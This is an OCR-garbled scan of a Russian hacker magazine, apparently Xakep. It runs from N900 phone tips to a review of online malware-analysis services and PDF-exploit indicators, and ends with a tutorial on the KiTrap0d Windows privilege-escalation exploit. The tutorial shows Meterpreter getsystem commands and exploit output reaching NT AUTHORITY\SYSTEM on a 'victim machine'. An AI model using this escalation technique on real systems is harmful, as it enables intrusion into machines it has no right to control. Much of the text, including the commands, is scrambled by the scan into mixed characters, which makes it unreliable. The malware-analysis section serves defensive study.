параметров аЬоиС : сопііід, с помощью филь- 
тра найти параметр Ьгомзег . сасЬе . йізк . 
епаЫе и поменять его значение. 

Еще один полезный хинт также касается 
браузера, но уже стандартного. Благодаря 
недокументированной опции, появившейся в 
последней прошивке, браузер можно переве- 
сти в портретный режим, нажав на клавиатуре 
одновременно ССгІ-ЗМНС+О, затем закрыв 
клавиатуру и перевернув телефон вертикаль- 
но. После этого N900 будет автоматически 
переходить в портретный режим в браузере 
при повороте в вертикальное положение, 
вплоть до выключения. 

ТРИК 5 БЕСПРОВОДНЫЕ 
КЛАВИАТУРА И МЫПІЬ 

Впрочем, браузер как рендерил хорошо сайты, 
так и рендерит. А вот, что действительно 
добавляет N900 функциональности — так это 
убойное приложение ВІиеМаето. Что оно 
позволяет? Превратить девайс на Маето в 
беспроводную мышку или клавиатуру, рабо- 
тающие через ВІиеооіН. Благодаря этой 
программе, можно эмулировать ВІиеТооіЬ- 
клавиатуру и мышку через стандартный 
профайл НЮ ВІиеіооЮ, который поддержи- 
вает большинство адаптеров синего зуба 
и операционных систем. После установки 
ВІиеМаето на телефоне нажми в нем Маіс 
а соппесСіоп (ожидание подключения]. 
Затем, если ты под виндой, открой параме- 
тры ВІиеІооІЬ-адаптера, найди пункт в меню 
или кнопку «Добавить устройство» и среди 
найденных беспроводных девайсов выбери 
устройство с именем твоего телефона. Во 
многих ВІиеІюоЮ-стеках у него будет соответ- 
ствующая пиктограмма: с клавиатурой и мыш- 
кой. После ввода ключей для авторизации на 
телефоне высветится сообщение об удачном 
подключении и появится интерфейс для уда- 



ленного управления. Выбор самый разный: ты 
можешь использовать сенсорный экран N900 
в качестве беспроводной мышки, или аппа- 
ратную клавиатуру для набора текста с рас- 
стояния. Самыми используемыми профилями, 
пожалуй, являются интерфейс для управления 
презентацией (перелистывание слайдов], а 
также пульт для управления медиа-плеером. 
Забавно, что с помощью той же самой 
ВІиеМаето можно играть и в РІауЗіабоп 3, 
добавив в настройках игровой консоли новое 
ВІиеІюоЮ-устройство. Что касается настоль- 
ных Итих-систем, то НЮ-профиль может быть 
подключен с помощью команды ЬсіЕооІ 
зсап, определяющей доступные устройства, и 
Мок! -соппесС ' адрес_ЬС_девайса_с_ 
Ьісі', выполняющей само подключение. 

ТРИК 6 ЭМУЛЯТОР N900 

Этоттрик касается скорее не нынешних поль- 
зователей N900, а тех, кто только планирует 
приобрести девайс, но сначала бы хотел 
испытать его в действии. Понятно, что стоя 
у прилавка магазина едва ли можно про- 
чувствовать всю мощь Біпих'а, зато эмулятор 
телефона, предоставляющий удаленный 
доступ к реальной системе, на которой ты 
можешь делать все, что угодно, в этом случае 

— вещь незаменимая. Уникальный сервис, 
благодаря которому становится доступной 
такая возможность, называется РЮА (Ретоіе 
Оеѵісе Ассезз] и доступен по адресу ари. 
псПіиЬ.пеі . Вход в систему осуществляется по 
логину/паролю, который ты получишь после 
регистрации на сайте ѵѵѵѵѵѵЧогит.покіа.сот . 
Для работы проверяется наличие нужного 
браузера (подойдет Рігебох, ІЕ, Орега и Забагі 

— я со своим Ооодіе СЬготе обломался], а 
также Ч РЕ. Если все в порядке, ты можешь 
выбрать нужный аппарат (любой из смартфо- 
нов компании, включая Иокіа Х6] и скачать 
.щір-файл, который запустит на твоем компью- 
тере эмулятор на Заѵа. 

Наверняка, за время работы у тебя накопи- 
лись и свои секреты! Присылай их нам — и мы 
обязательно опубликуем их в нашем разделе 
про Маето ( ѵѵѵѵѵѵ.хакер.ги/П900 ]. т 
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А нтивирусные компании накопили 

огромный арсенал средств и ноу-хау 
для сбора новых образцов малвари 
и исследования сомнительных фай- 
лов, анализа и реверсии га тел ви- 
русов. Но чтобы определить, делает ли файл 
что-то сомнительное или нет, не надо быть 
специалистом антивирусной лаборатории. 
Провести свой анализ помогут несколько 
подручных средств. 

ѴІРІІ5Т0ТАІ. 

МШ.У1РН5ША1..С0М 

Если у меня есть сомнения по поводу 
какого-то файла, первым делом я заливаю 
его на ѴігизТоІаЕ Преимущество очевидно: 
за раз можно проверить файл на наличие 
малвари более чем 40 разными антиви- 
русными продуктами, используя последние 



доступные сигнатуры. Результат интересен 
не только с точки зрения, заражен файл или 
нет, но еще и для сравнения эффективности 
разных антивирусов, работы эвристиче- 
ских алгоритмов и проверки работы своих 
крипторов :). Сервис использовать гораздо 
удобнее, если установить в систему специ- 
альную программу-загрузчик ѴігизТоіаІ 
Ііріоасіег. В контекстном меню появляется 
новый пункт, через который можно быстро 
передать файл на проверку. К тому же, во 
второй версии программы появился еще и 
графический интерфейс, — с ним легко про- 
веряется любой из текущих процессов. С 
другой стороны, далеко не всегда эвристика 
и сигнатурные базы, даже всех антивиру- 
сов сразу, могут обнаружить уникальную 
малварь, правильно упакованную и пока не 
«опалившуюся». Тут ничего не остается, как 



самому брать в руки инструменты и изучать 
поведение программы. 

5АШ0ХІЕ 

ШѴШШОХІЕ.СОМ 

Есть два способа узнать, что делает про- 
грамма: отреверсить ее, что сложно и долго, 
или запустить, посмотрев, что после этого 
произойдет. Правда, запускать сомнительный 
файл в своей системе сродни с самоубий- 
ством, поэтому делать это нужно в безопасном 
окружении. Не будем в очередной раз касать- 
ся виртуальных машин, хотя это, безусловно, 
один из лучших способов, а воспользуемся 
на этот раз песочницей (запсІЬох]. Любая 
программа, запущенная в такой песочнице, 
функционирует также, каки если бы была 
запущена просто в системе, однако файловая 
система и реестр для нее особенным образом 
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РЕЗУЛЬТАТ АНАЛИЗА ФАЙЛА СѴѴЗАЫОВОХ'ОМ 




ИНТЕРФЕЙС УПРАВЛЕНИЯ «ПЕСОЧНИЦЕЙ» 



виртуализируются, чтобы любые изменения 
всегда можно было откатить. Начиная с Ѵізіа 
встроенная «песочница» есть в винде: пере- 
вести любое приложение в запббох можно 
через менеджер задач, выбрав в контекстном 
меню пункт «Виртуализация НАС». Пользуются 
ей немного, что неудивительно, потому как 
решения от сторонних разработчиков намного 
понятнее, в том числе и программа ЭапсІЬохіе. 
Виртуализировать критические участки систе- 
мы для любого приложения можно в два клика 
мыши, причем программа легко настраивается 
так, чтобы заданные файлы всегда запуска- 
лись только в запбЬох'е. 

«Ну, хорошо, запустили мы файл под 
запббох’ом, далыше-то что?» — спросишь ты. 
Как что — изучать, чем занимается программа 
после запуска. На помощь приходят утилиты 
из набора Зузіпіегпаіз ЕесЬпеЕптсгозоИ 
сот/ги-ги/зѵзіпіегпаіз ) и, в первую очередь, 
Ргосезз МопЕог, который в реальном времени 
отслеживает активность файловой системы, 
реестра, процессов, потоков и библиотек ОН. 
Благодаря другой утилите из того же Аиіогипз 
несложно выяснить, не прописала ли себя 
утилита в каком-нибудь из мест автозагрузки. 
Малварь также можно распознать по АРІ- 
функциям, которые вызывает программа. 
Отследить такие вызовы поможет АРІ МопіЬг 
( ѵѵѵѵѵѵ.аріппопіЬг.сопп ) или бесплатная тулза 
ЗузАпаІугег [ ІаЬз.ісІеІюпзе.сопп І. Список про- 
грамм можно продолжать, в конечном итоге, 
мы получаем немаленький набор утилит, чтобы 
только проанализировать работу приложения. 
Получается довольно муторный процесс, кото- 
рый, разумеется, можно упростить: прежде 



чем рваться в бой, проводя исследование 
вручную, отправить бинарник специальному 
автоматическому анализатору. 

ШЗАШОХ 

ММ.Ш5АШ0Х.0РВ 

Выполнить все те же самые действия, но в 
автоматическом режиме берется онлайн- 
сервис СѴѴЗАпбЬох. Получив исполняемый 
файл, система запустит его в «песочнице» и 
беспристрастно проследит за всем, что тот 
проделает в системе. Способ лучше, чтобы 
быстро получить справку о том, что делает 
подозрительный бинарник в системе, еще 
нужно поискать! Нет никакой необходимости 
геморроиться с установкой «песочницы» или 
виртуальной машины и самому анализировать 
результаты работы мониторов — СѴѴЗАпбЬох 
все сделает за тебя, а на выходе по всем пунк- 
там выдаст подробный отчет. Правда, ждать от 
СѴѴЗАпсІЬох чудес не стоит: сервис не скажет 
«Что-то мне этот бинарник не нравится, похо- 
же, это троян». Интерпретация отчета полно- 
стью остается на твоей совести. А, значит, 
нужно иметь представление, где может про- 
писать себя малварь в реестре, каким обра- 
зом ей удается спрятаться в процессах и где 
частенько хранятся тела вирусов в файловой 
системе. Небольшой автоматический интер- 
претатор наиболее характерных для малвари 
действий тут бы не помешал... 

ТНРЕАТ ЕХРЕКТ 
ШѴѴ.ТНКЕАТЕХРЕРТ.СОМ 

В пример можно ставить ТЬгеаІ ЕхреН, кото- 
рый не отдает анализ на откуп одному только 



пользователю, а сам пытается анализировать 
изменения в системе. Так, если файл упакован 
с помощью криптора или в реестре добавился 
новый ключ для автозапуска, или, например, в 
файле Ьозі: появились строчки, которые могут 
заблокировать доступ к базам антивирусов — 
словом, зафиксированы характерные для мал- 
вари действия — ТЬгеаІ: ЕхреН обязательно 
акцентирует на этом внимание. В результате, 
отдельный раздел отчета складывается из 
набора таких «очеловеченных» сообщений, 
напротив каждого из которых выставляется 
степень опасности. Сервис не оставит в неве- 
дении и о том, как выглядит программа после 
запуска: если у той есть СЕІІ-интерфейс, то в 
отчете будет представлен ее скриншот. Круто? 
Это еще не все, поведенческий анализатор 
дополняется проверкой файла сразу несколь- 
кими антивирусами. В итоге мы получаем 
вариант «Два в одном»: функциональность 
СѴѴЗАпсІЬох и, одновременно, ѴігизТоіаІ 
(правда, с намного меньшим количеством 
поддерживаемых антивирусов]. Файл для про- 
верки можно отправить через веб-интерфейс 
или специально разработанную утилиту, но в 
обоих случаях необходима предварительная 
регистрация в сервисе. 

АШІЗ 

АШІ5.І5ЕСІ.АВ.0Р6 

Единственное, чего, пожалуй, не хватает отче- 
там ТЬгеаІ: ЕхрегЕ и других анализаторов, — 
это данных о том, что передавало приложение 
в Сеть. Да, все сетевые соединения фикси- 
руются и даже, зная их природу, можно уже 
многое сказать... но как точно узнать, что пере- 
давало приложение? В случае с «песочницей» 
и виртуальной машиной трафик приложе- 
ния легко снифается любым мало-мальски 
рабочим снифером. Почему такую опцию не 
прикрутили рассмотренные анализаторы, 
непонятно, но зато ей может похвастать дру- 
гой сервис — АпиЬіз. К отчету о деятельности 
программы прикладывается рсар-файл со 
всем отснифанным трафиком, который легко 
обрабатывается с помощью мощнейшего 
ѴѴігезЬагк'а, умеющего расшифровывать 
ошеломляющее количество протоколов, и 
ІЧеЕл/огк Міпег [ пеІѵуогктіпегзоигсеФгде.пеІ: ). 
специально предназначенного для офлайн- 
анализа и сбора интересных данных. Мало 
того, в сам АпиЬіз встроен анализатор трафика 
для наиболее популярных протоколов. Если 
приложение обменивается по НТТР, то сер- 
вис вложит в отчет урезанный лог общения. 
Вообще, качество сканирования оставляет 
самое приятное впечатление: приводится не 
просто отчет о деятельности системы, но и 
анализ характерной для вирусов активности. 
Единственный минус системы — довольно 
медленная скорость работы. 

СОМООО 1№ТАЫТ МАШАРЕ АИАІ.Ѵ5ІЗ 

САМАЗ.С0МСШ0.С0М 

Онлайн-анализатор от компании Сотобо рас- 
кручен намного меньше: очереди на сканиро- 
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В ОТЧЕТЕ АЫУВІ5 ЕСТЬ ССЫЛКА ДЛЯ СКАЧКИ РСАР-ФАЙЛАС ДАМПОМ 
ТРАФИКА 



вание постоянно пустые, а сам сканер чертов- 
ски быстр. К тому же, большая популярность 
СѴѴЗапбЬох и ТЬгеаІ Ехреіі нередко выходит 
им боком. Особо продвинутая малварь умеет 
распознавать виртуальное окружение, и, 
смекнув, что запущена под виртуалкой или 
«песочницей», не производит каких-либо 
подозрительных действий. Анализатор 
Сотобо намного менее известен, поэтому 
разработчики едва ли тратят время на его 
распознавание. При этом, сам сканер весьма 
неплох: в самые кратчайшие сроки он прово- 
дит глубокое исследование и выдает удобный 
для анализа отчет, в котором помимо прочего 
выводится информация о выполненных 0І\І5/ 
НТТР-запросах, вызовах АРІ-функций, под- 
груженных в память ОІ_І_- библиотеках и т.д. 
Весь этот набор полезной информации поды- 
тоживает вердикт, может ли файл оказаться 
малварью или, скорее всего, нет. 

МАМІАОТ РЕО СІШАШ 

ѴѴѴѴѴѴ.МАНОІАНТ.СОМ 

Свой вердикт выносит и анализатор Мапсііапі 
Веб Сигіаіп, реализованный в виде отдельно- 
го приложения. Для исследуемого РЕ-файла 
подсчитываются так называемые очки: чем 
их больше, тем выше шанс, что приложение 
окажется вирусом. Очки проставляются исходя 
из целого ряда критериев, где, помимо ряда 
стандартных проверок, учитывается интерес- 
ный параметр — энтропия кода, под которой 
понимается мера дезорганизации и случай- 
ности. Авторы малвари намеренно запутывают 
код, выполняя с помощью различных методик 
его обфускацию, добавляя многочисленные 
ветвления и т.д. (вспомни «спагетти -код»]. Для 
таких исполняемых файлов показатель энтро- 
пии, посчитанный Мапсііапі Веб Сигіаіп, выше, 
чем для обычного неупакованного приложения, 
и анализатор придает этому большое значение. 

РЕЮ 

РЕШ.НА5.ІТ 

Еще одним косвенным признаком того, что 
приложению есть что скрывать, является 
использование криптора/упаковщика. Таким 
образом, во-первых, усложняется реверсинг 
тела, а, во-вторых, удается скрыться от сиг- 



натурных баз и эвристических механизмов 
антивирусов. Определить факт использо- 
вания криптора и, зачастую, название упа- 
ковщика поможет утилита РЕЮ. На текущий 
момент с ее помощью определяется более 
600 различных сигнатур для РЕ-файлов, 
отображая помимо пакера/криптора, еще 
и предполагаемый компилятор. Помимо 
оригинальной программы, существует над- 
стройка в виде скрипта на Руібоп пРЕіб 
[ ЬіІрУА/ѵѵѵѵѵ.ппаІІогде.сопп/преісІ/преісІ. 

2 Ір ). Он умеет обрабатывать рсар-файлы с 
отснифанным трафиком для поиска закрип- 
тованных РЕ-файлов, которые потенциально 
могут быть опасны. Впрочем, ждать от РЕЮ 
чуда не приходится: приватные крипторы 
ему не по зубам. 

ОЗАМ 

утушшЕ-50Ш1(ш$.ри/ 

РШиСТЗ/ОЗАМ-АІЛОКІШ- 

МАМ6ЕР.НТМІ. 

Как бы ни был закриптован руткит, ему все 
равно нужно как-то обосноваться в системе, 
обеспечив себе автоматический запуск после 
ребута. Поэтому особую ценность представля- 
ет утилита Опііпе 5оІиІіопз Аиіогип Мападег, 
которая распознает практически все извест- 
ные способы автоматической загрузки. 
Производится ли скрытый запуск драйвера 
руткита или речь о других скрытых ключах в 
реестре — неважно. 05АМ с большой вероят- 
ностью детектирует любой вариант. Понятно, 
если для поиска руткита в реестре использо- 
вать обычный редактор реестра, то шансы на 
положительный результат будут небольшие. 
Перехватив вызов соответствующих АРІ- 
функций (ПедСіиегуѴаІие, РедОрепКеу и т.д.], 
руткит вернет подчищенный результат. Чтобы 
не обломаться подобным образом, 05АМ 
сам парсит файл с реестром и не использует 
системных функций ОС. Кстати говоря, слово 
«Опііпе» в названии программы неслучайно: 
все процессы, найденные в автозапуске, 
можно пробить по специальной базе, отпра- 
вив запрос с хешем файла или сам файл на 
анализ. В отчете о сканировании для каждо- 
го элемента автозагрузки приводится рейтинг 
надежности. 



До этого момента мы рассматривали случай, 
когда угрозу представляют исполняемые 
файлы. Но если посмотреть на статистику 
сплоитов за последние полгода, станет 
очевидным еще один внушительный вектор 
атак. Это РОЕ-файлы с инжектированными 
сплоитами, которые эксплуатируют много- 
численные уязвимости АбоЬе Веабег. Если 
по несчастному Іпіегпеі Ехріогегуже про- 
шлись вдоль и поперек, то АбоЬе Веабег 
оказался непаханым полем для хакеров, 
при этом продукт имеет огромное распро- 
странение. Для эксплуатации критических 
уязвимостей, как и в сплоитах для браузера, 
чаще всего используется код на ЭаѵаЗсгі рѣ, 
который может быть вставлен в РЭЕ-файлы 
несколькими способами. Вообще, если в 
РЭЕ есть вставки на 4аѵа5сгірІ, то файл, 
скорее всего, действительно опасен, но 
как это определить? Самый очевидный 
путь — распарсить РЭЕ-файл на блоки и 
посмотреть, что там внутри, но это сложный 
процесс. Легче выполнить в РЭЕ поиск по 
нескольким ключевым словам, наличие 
которых позволяет сделать вывод о вкра- 
плениях кода на 4аѵа5сгірІ'е. Например, 
«/45» или «/4аѵа5сгірІ» явно указывают, что 
документ содержит 45-код. Другие два клю- 
чевых слова — «/АА» и «/ОрепАсІіоп» — 
сигнализируют о том, что в файле про- 
писано автоматическое действие, которое 
выполняется в момент чтения документа. 
Именно эту возможность РОЕ малварь 
использует для запуска 45-сценария без 
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АНАЛИЗ СТРАНИЦЫ СО СПЛОИТОМ 



участия пользователя, поэтому к подобным документам 
стоит отнестись с осторожностью. Выполнить быстрый 
поиск таких строк позволяет утилита РБЕЮ, входящая в 
набор РОР Тооіз и написанная на РуШоп'е. Если резуль- 
таты поиска явно укажут, что в документе находятся 
фрагменты на 45, можно попробовать извлечь их с 
помощью другой утилиты из набора — рсІРрагзег. А вот 
для анализа 45-кода уже придется использовать другие 
инструменты. 

ѴѴЕРАѴѴЕТ 

ѴѴЕРАѴѴЕТ.ІЗЕСІ.АВ.0РВ 

Вышеупомянутые онлайн-сервисы в основном зани- 
мались обработкой РЕ-файлов. А вот проект ѴѴераѵѵеІ: 
специализируется исключительно на проверке подо- 
зрительных РОЕ, НТМЕ и Еіазб документов — в любой 
из них может быть инжектирован зловредный код. 

В основе ѴѴераѵѵеІ: лежит мощный движок, который 
справляется со многими приемами обфускации кода, 
а также сигнатурная база для определения заразы. 
Если в документе обнаружится малварь, ѴѴераѵѵеІ 
выдаст подробный отчет, а зачастую даже ссылки 
с описанием уязвимостей, которые эксплуатируют 
найденные в документе сплоиты. ѴѴераѵѵеІ: — еще и 
отличный помощник в дешифровании 45-скриптов, 
вкрапленных в НТМЕ, когда ручной анализ сильно 
затруднен и занимает много времени. Для 5ѴѴЕ- 
файлов также выводится информация об обфуска- 
ции кода и статистика по вызовам различных функ- 
ций, а в некоторых случаях — даже автоматически 
извлекается шелл-код! 

МАШАКЕ ІМ 
ѴШѴѴ.МАІ.ѴШЕІЖ.СОМ 

Если изучаемый документ ссылается на объект, рас- 
положенный на другом ресурсе, ѴѴераѵѵеІ: обязатель- 



но пробивает его по базе Маіѵѵаге II РЕ. Этот ресурс 
в автоматическом режиме собирает подозрительные 
линки и проверяет закачанные файлы четырьмя 
анализаторами (ѴігизТоіаі, ѴѴераѵѵеІ, АпиЬіз, Тбгеаі 
Ехрегі], составляя сводный отчет. База постоянно 
растет: сейчас в ней более пятидесяти тысяч запи- 
сей об опасных ресурсах, с которых осуществляется 
загрузка малвари. После регистрации каждый может 
скачать и использовать базу в своих целях, а также 
получать обновления через Р55. К тому же, это удоб- 
нейшая штука, когда нужно собрать свежих образцов 
разной заразы :]. 

ЛАБОРАТОРИЯ ЗАКРЫТА, ПРИХОДИТЕ ЗАВТРА! 

Чтобы распознать опасный файл, необязательно ревер- 
сить его тело и разбираться во внутренностях. Зачастую 
признаки малвари находятся на поверхности, а рас- 
познать их можно вполне простыми инструментами. 
Ведь недаром разработчики малвари больше всего 
боятся проактивных технологий, изучающих поведение 
программы после запуска. Тут уж действительно очень 
сложно что-либо утаить, т 



БАЗА ДАННЫХ С ИНФОРМАЦИЕЙ ОБ ОПАС- 
НЫХ РЕСУРСАХ, ОТКУДА ПРОИЗВОДИТСЯ 
ЗАГРУЗКАЗАРАЗЫ 
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• Для реализа- 
ции «песочницы» 
существует до- 
статочно много 
разных продуктов, 
втом числе Реіигпіі 
ѴігЕиаІ Бузует [ ѵѵѵѵѵѵ. 
геШгпіІѵігШаІзузІет. 
сот ). 

• В случае исполь- 
зования встроенной 
«песочницы»ѴѴіпбоѵѵ5 
для изолированного 
приложения виртуа- 
лизируется далеко не 
вся система, а лишь 
ряд важных элемен- 
тов: папки Ргодгат 
Рііез, ѴѴіпсІоѵѵз, Е1зегз\ 
% А 1 1 II з е гз Р гоб Іе %\ 
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и ветвь реестра НКЕМ\ 
ЗоіЧѵѵа ге. 

• Есть еще один 
толковый онлайн- 
сервис, который не 
попал в наш обзор. 

Это ІЧогтап ЗапбЬох 
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зесигііу сепіег/ 
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и скрипты, которые 
упоминались в мате- 
риале, ждуттебя на 
нашем БѴБ. 
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ІѵѵіІІег.сот/зІераЬ 



6ЕТ5Ѵ5ТЕМ 



а 



N1 АІІТН0РІТУХ5УЗТЕМ 



N1 АІІТН0РІТУХ5У5ТЕМ 



ВЕТ5У5ТЕМ 



ДОЛОЙ ВДШГШ 

ПОВЫШАЕМ ПРИВИЛЕГИИ 

ДО ИТ АІІТН0РІТУХ5У5ТЕМ В ЛЮБОЙ 

ВЕРСИИ ѴМОѴѴЗ 



БУКВАЛЬНО ЗА НЕСКОЛЬКО ДНЕЙ ПЕРЕД СДАЧЕЙ НОМЕРА В ПЕЧАТЬ МЕТА5РЮІТ 
ОБЗАВЕЛСЯ СВЕЖЕНЬКИМ МОДУЛЕМ, ПРО КОТОРЫЙ МЫ ПРОСТО НЕ МОГЛИ 
НЕ РАССКАЗАТЬ. БЛАГОДАРЯ НОВОЙ КОМАНДЕ 6ЕТ5Ѵ5ТЕМ, НА СКОМПРОМЕТИРО- 
ВАННОЙ СИСТЕМЕ СТАЛО ВОЗМОЖНО ПЕРЕЙТИ ИЗ ИЗЕК ІЖІ В Ш60, ПОЛУЧИВ 
ПРАВА ИТ АІЛН0РІТѴ\5Ѵ5ТЕМ! И ЭТО - В ЛЮБЫХ ВЕРСИЯХ ВИНДЫ. 



В нынешнем году 19 января стала 
публичной О-сІаууязвимость, по- 
зволяющая выполнить повышение 
привилегий влюбой версии ѴѴіпсІоѵѵз, 
начиная от І\ІТ 3.1, выпущенной в еще 
в 1993 году, и заканчивая новомодной «семер- 
кой». На ехрІоіІ-сІЬ.сопп хакером Таѵіз Огтапбу 
были опубликованы как исходники сплоита 
КіТгарОб.таки скомпилированный бинарник, 
готовый кприменению. Опробовать оригиналь- 
ный сплоит можетлюбой желающий. Для этого 
нужно лишь извлечь из архива ѵбтехр Іо іОсІИ и 
ѵбтаііоѵѵесі.ехе, каким-либо образом передать 
на машину-жертву, и там запустить ехе-ш ни к. 

В результате, независимо оттого, под акка- 
унтом какого пользователя выполнен запуск, 
появится консоль с привилегиями системного 
пользователя, то есть І\ІТ АІІТН0ШТѴ\5Ѵ5ТЕМ. 
Проверки ради можно запустить сплоит на сво- 
ей машине, предварительнозалогинившись 
в систему под обычным пользователем. После 
запуска сплоита откроется новое окно стсі.ехе 
с максимальными привилегиями. Что это дает? 
Представь ситуацию, что сплоит пробивает 
некоторое приложение и получает шелл на 
удаленном компьютере. Пускай это будет сплоит 
для Іпіегпеі Ехріогег— в этом случаеу взлом- 
щика на руках будет доступ к системе с правами 
того пользователя, подучеткой которого был за- 



пущен браузер. Не спорю, очень часто это будет 
аккаунте правами администратора (пользова- 
тель сам виноват], но если нет? Вотздесь-то и 
можно заюзать КіТгарОб, чтобы поднять свои 
привилегии до І\ІТ АІЛН0НІТѴ\5Ѵ5ТЕМ! Мало 
того, даже те пользователи, которые входят в 
группу администратора, не могут обращаться 
к некоторым участкам системы, например, для 
чтения хешей паролей пользователей (об этом 
ниже]. А І\ІТ системный акаунт— может! При 
всем этом, на момент публикации статьи ни 
одного патча со стороны Місгозоіі, закрываю- 
щего уязвимость, выпущено не было. 

ОПЕРАЦИЯ «ЗАХВАТ СИСТЕМЫ» 

Демонстрировать в действии оригинальный 
сплоит мы не будем, потому как 25 января в 
Меіазріоіі: был добавлен новый скрипт, благо- 
даря которому использовать КіТгарОсІ стало 
еще удобнее. Первоначально попавший в 
базы модулей вариант был нестабилен и 
срабатывал не всегда, но не прошло и пол- 
дня, как все ошибки были устранены. Сейчас 
модуль закачивается вместе со всеми осталь- 
ными обновлениями, так что для установки 
достаточно выбрать пункт в меню «Меіазріоіі: 
ирсіаію». Теперь, имея доступ к удаленной 
системе, можно набрать «гип кТгарОсІ» и 
привести сплоит в действие. «Но раз пошла 



такая пьянка, реализуем-ка мы для этого дела 
специальную команду», — подумали разра- 
ботчики МеІазрІоіЕ В результате получилась 
замечательная такая команда «повысить 
привилегии», доступная через расширение 
теіегргеіег, — нам она очень нравится :]. 

Итак, у нас есть доступ к удаленной системе 
(наглядный пример эксплуатирования при- 
веден в статье «Операция «Аврора») и мы 
находимся в консоли метасплоита. Посмотрим, 
каку нас обстоят дела с правами: 

шеСегргеСег > деСиіс! 

Зегѵег изегпате: Ѵ/ШХРЗРЗ \изег 

Ага, обычный пользователь. Быть может, он 
даже входит в группу администраторов, но 
нам это неважно. Подключаем модуль, в кото- 
ром реализована интересующая нас команда 
деізузіет, и проверим, погрузилась ли она, 
отобразив на экране справку: 

теСегргеСег > изе ргіѵ 
Ьоасііпд ехСепзіоп ргіѵ. . . зиссезз . 
теСегргеСег > деСзузСет -Ъ 
ТЗзаде: деСзузСеш [орСіопз] 

АСРетрС Со еІеѵаСе уоиг ргіѵііеде 
Со СЬаС оі Іосаі зузСет. 

ОРТІСЖЗ : 



► 032 
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6ЕТ5У5ТЕМ 
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мт литигшітѵхеѵотсм 



Согптапгі Рготрі - ѵсІтаИоѵгаскехе 



2 1,867,161,600 ЪуСен Ігее 

С:ЧОосипеп^с апй ЗеІЪіпс^МІ'гегЧМу Оосшіел1;2ЧКіТгар0Б>ийпа11оыеіі.ехе 

Иіпйоіге НТ 72 К^К ? у 2 КЗ ЛІ 1 5 Т А /2 К8 /7 М*УйиСвпі;го1О->НіТгар0а ІосаХ ехріоі* 

— — ■ ■ - Ёаи ізоРейІ . ІопезЬаг .огу 

1 + 1 Йрлѵтіпу а зЬеН со діме 8Ѵ8ТЕИ соке л <Ло по с сіозе ІО 
Е?1 Сі еаЕеРі'0се5Е< , ‘С:\ШШОиБ\5Ѵ5ТЕМ32\СГПЬЕХЕ"} => 4092 
[?] СеіМегзіопЕхО => 5.1 

І?1 Nс^иогуЕі^зСепIІ^^Го*'паСіопО «> ЧШЫРОи8хБу5і:еет32Чп1гкѵ‘пІр<і,ехе(?804В7000 
ГТ 1 ЗеагеЫпд Тог кегле 1 5*1 зідглаСиге < 64, аі, . ** > ... 

1 + 1 КІдпаСиге Гоипгі 0x28 90а ЬуСез Ргоп кегле X Ьазе 
1 + 3 Бсагсіпд сЬе НТ М ОН зиЪзузсеп Ъу ІаипсМпд НЗ-ООК ехесислЫе 
[?] СгеаСеРг0се52< , ‘С:МЛНОО^8\5У5ТЕМ32ЧОЕВиС.ЕХЕ^> => 768 
С?3 Орел Ргосезз <768 > -> 0x740 

I?] ІллесСіпд СЬе ехріоіс сЬиеагі іоСо ЫТУОН зиЬзузСеп 00x740 
1?1 игіСеРг0се5ЕНепогу<0х7аѲ, 0x2070000, '’МВНЕХРЬОІ Т . ОЬЬ”, 14 >; 

[?] На ІС Рог® іодХеОЬ^ес С <0х7с4 , ШРІНІТЕ>; 

[?І Се СЕхіССогіеТ Ьге а4< 0х7с4 , 0012РР44>; => 0x77303074 
1 + 1 ТЬе ехрХоіС сЬгеас! горогСз ехрІоіСАСіоп паз зиссоааГиІ 
1 + 1 Ы00 С ? Ѵои сап пои ине СЬе гЬеІІ о репе 4 еагііег 
1+1 Ргезз ап у кеу Со ехіс 







ОРИГИНАЛЬНАЯ ВЕРСИЯ КІТКАРОй В ДЕЙСТВИИ 






0®(Е 



О [5/іСет Ргосмз] 

4 гузСвт 

I 544 вггвз.бхе 
бое С5Г55 г ехе 
I 63 2 «і піадоп. ехв 

676 зегѵісез.ехе 

688 1 5аБь. ехе 

344 ѵтасСЫр.ехе 
^ехе 

856 зѵсбозс.ехе 
940 ьѵдбо&С.ехе 
I 1032 БѵсбаьІ.еХе 
I 1080 аѵсбоБІ.ехя 
1196 зѵсбозС.ехе 
I 1376 5рооІ5ѵ.еке 
1660 ехріогег.ехе 
1768 ѴМмагеТгау.ехе 
ау .ехе 

17 76 ѴИі^геОзег, ехе 
I ег.іхе 

1976 чтйюізскехе 
I , ехе 

260 ѵМИіздгас)ене1рег.-ехе 
I еНеІ рег . ехе 
724 аід.ехе 
1736 маспС+у.ехЕ 



НТ А0ТН0«ІТД5Ѵ5ТЕИ 
НТ АиТН0КІТѴ\5Ѵ5ТЕМ 
НТ АИТН0КІТА5Ѵ5ТЕМ 
НТ АиТНОК ІТУ\5Ѵ5ТЕМ 
НТ АИТНОЯІТѴ\5Ѵ5ТЁМ 
НТ АІІТНОЕ ІТУ\5Ѵ5ТЕМ 
НТ АОТНОЯ ІТѴ\5У5ТЁИ 

НТ АОТНОК ІТА5Ѵ5ТЕН 
НТ АітЮИТѴ\МЕТѴОКК 5ЕРУІСЕ 
НТ АЧТНОЯ ІТУ\5У5ТЕМ 
НТ АиТНОКІТЛНЕТѴЯЖК 5ЕЯѴІСЕ 
НТ АОТНОЯІТАСОСАІ 5ЕКѴІСЕ 
НТ АІІТНОЯ ІТУ\5У5ТЕМ 
ТЁ5ТЬАВ-Ѳ8ВВ39б\АЙТП ПІ зТгаІОГ 
ТС 5ТІ ДЕ -а аввз 96\А<Ьпі л і Б-Ьгаіа г 

ТС5Т|.Ае-8вВИ96\А*т пі 5*га1ог 

НТ АОТНОЯ ІТѴ\еѴ9ТЕИ 

НТ АИТНОЯІТѴХ5Ѵ5ТЕИ 

НТ АИТНОЯГТЛ^ОСАІ 5ЁЙѴ1СЁ 
ТС 5 ТІ. ДЕ - В ввез 96\Айпі л і аТгаСо г 



\5у 5± етгйоо±\5уас стЗ 2 \зпіБ 5 . *Хе 

\??\С ЛМІШОілЕЧэузСепагЧсзгзб . ехе 

\? ?ЧС :\ѴЯ ИЕХМ5Ч5У зЬетЗ 2\«і піодоп. ехе 

С :\ЫІМ)0И5\*у5і:ет32\5егѵі сез . ехе 

С ! ' \«Г ГЙХМ5\ау 5* етЗ 2\Т б а&е . ех е 

СДРгодгат Рі1ез\ѴМѵѵаі'е\Ѵ№оаге ТооІ5\ѵтаеіІі1р 

с :\нінхж5\зузсеіи32\зѵеІѵізс. ехе 
С:\МІМЮѴ«\5у5Сет32Ч5ѵс6аз1:, ехе 
Сі\ИІИЮУ5\5уіСеііЯ2\зѵеІ«5Т. ехі 
